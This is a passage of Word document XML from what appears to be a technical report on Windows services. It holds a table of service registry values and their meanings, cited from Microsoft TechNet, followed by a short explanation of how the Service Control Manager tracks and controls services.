                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2B3F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="002C2B3F" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2B3F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="002C2B3F" w:rsidRDefault="00135336" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2B3F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>DependOnGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_MULTI_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t xml:space="preserve">Lists load-ordering groups on which </w:t>
            </w:r>
            <w:r w:rsidR="00E41963">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF58DA">
              <w:t xml:space="preserve"> services depend. Services that depend on a group can run if, after attempting to install all members of a group, at least one member of the group is running.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>DependOnService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_MULTI_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="002C2B3F" w:rsidP="00C44A6F">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2B3F">
              <w:t xml:space="preserve">Lists the names of </w:t>
            </w:r>
            <w:r w:rsidR="00E41963">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2B3F">
              <w:t xml:space="preserve"> services on which this service depends. SCM must start these services before it starts this service.</w:t>
            </w:r>
            <w:r w:rsidR="00C44A6F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2B3F">
              <w:t xml:space="preserve">This value can be an </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2B3F">
              <w:lastRenderedPageBreak/>
              <w:t>empty string if the service has no dependencies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:lastRenderedPageBreak/>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00944C64" w:rsidRDefault="00944C64" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00944C64">
              <w:t>Describes the service. The description is simply a comment that explains the purpose of the service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>DiagnosticsMessageFile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00944C64" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00944C64">
              <w:t xml:space="preserve">Contains the name of the resource DLL that contains the event description strings for those events that the service writes into the application event log. Resource DLLs </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00944C64">
              <w:t>are located in</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00944C64">
              <w:t xml:space="preserve"> the \Program Files\Exchsrvr\Res directory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>DisplayName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00944C64" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00944C64">
              <w:t>Contains the display name that is used to identify the service. This string has a maximum length of 256 characters. The name is case-preserved in SCM. Display name comparisons are always case-insensitive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>ErrorControl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_DWORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00944C64" w:rsidRDefault="00944C64" w:rsidP="00944C64">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies error severity and the action taken if this service fails to start. This parameter determines one of the following:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00944C64" w:rsidRDefault="00944C64" w:rsidP="00247427">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>The startup program logs the error but continues the startup operation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00944C64" w:rsidRDefault="00944C64" w:rsidP="00247427">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>The startup program logs the error and displays a message but continues the startup operation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00944C64" w:rsidRDefault="00944C64" w:rsidP="00247427">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The startup program logs the error. If the "last known good" configuration is started, the startup operation continues. Otherwise, the system is restarted with the </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>"last known good" configuration.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00135336" w:rsidRDefault="00944C64" w:rsidP="00247427">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>The startup program logs the error, if possible. If the "last known good" configuration is started, the system startup is cancelled. Otherwise, the system is restarted with the "last known good" configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:lastRenderedPageBreak/>
              <w:t>FailureActions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_BINARY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00247427" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00247427">
              <w:t>Cites the action SCM should take for each failure of a service. A service is considered failed when it stops without reporting a status to the service controller (for example, when a service fails).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00247427" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00247427">
              <w:t>Names the load-ordering group of which this service is a member. Note that setting this value can override the setting of the DependOnService value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>ImagePath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_EXPAND_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00247427" w:rsidRDefault="00247427" w:rsidP="00247427">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Contains the fully qualified path to the service binary file. If the path contains a space, it must be quoted, so that it is correctly interpreted. For example, "d:\\Program Files\\Exchsvr\\Bin\\mad.exe".</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00135336" w:rsidRDefault="00247427" w:rsidP="00247427">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>The path can also include program arguments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>ObjectName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00247427" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00247427">
              <w:t xml:space="preserve">Specifies the name of the account under which the service should run. If the service uses the LocalService account, this parameter is set to NT AUTHORITY\LocalService. It is also possible to specify an </w:t>
            </w:r>
            <w:r w:rsidRPr="00247427">
              <w:lastRenderedPageBreak/>
              <w:t>account name in the form DomainName\UserName.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:lastRenderedPageBreak/>
              <w:t>Start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_DWORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00247427" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00247427">
              <w:t>Specifies when to start the service. SCM can start a service automatically during system startup, or when a process requests the service start. This value can also specify that a service cannot be started and that attempts to start the service should result in the error code ERROR_SERVICE_DISABLED.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>Tag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_DWORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00247427" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00247427">
              <w:t>Determines the service startup order within a load-ordering group. Tags are only evaluated for driver services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_DWORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00247427" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00247427">
              <w:t>Specifies the service type as file system driver, device driver, a service that runs its own process, or a service that shares a process with one or more other services. MSExchangeSA is an example of a service that runs its own process. EXIFS is an example of an Exchange-specific file system driver.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AF58DA" w:rsidRDefault="00AF58DA" w:rsidP="00AF58DA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00135336" w:rsidRPr="00C44A6F" w:rsidRDefault="00135336" w:rsidP="00C44A6F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc484886364"/>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> values and description</w:t>
      </w:r>
      <w:r w:rsidR="00C44A6F" w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="00135336" w:rsidRPr="00C44A6F" w:rsidRDefault="00C44A6F" w:rsidP="00C44A6F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>From:</w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="00135336" w:rsidRPr="00C44A6F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/881d8b23-d274-4313-a666-88f80c2cfd92.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006A6051" w:rsidRPr="006A6051" w:rsidRDefault="006A6051" w:rsidP="006A6051">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6051">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Service Control Manager manages </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6051">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00135336" w:rsidRDefault="00131B99" w:rsidP="00135336">
      <w:r>
        <w:t xml:space="preserve">Enumerating services by reads each </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key at one from the services database, SCM can create a record for each service. A service record is a set of a service name, startup type, the service status (the current state, acceptable control codes, …) and a pointer to the dependency list of that service. </w:t>
      </w:r>
      <w:r w:rsidR="002F6C96">
        <w:t>SCM uses these records to determine which actions are valid for the services, according to their current status</w:t>
      </w:r>
      <w:r w:rsidR="00790F27">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="002F6C96">
        <w:t xml:space="preserve"> and dependencies. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063F47" w:rsidRDefault="00063F47" w:rsidP="00135336">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To start or stop a service, SCM communicate with the service it controls via a RPC. </w:t>
      </w:r>
      <w:r w:rsidR="00790F27">
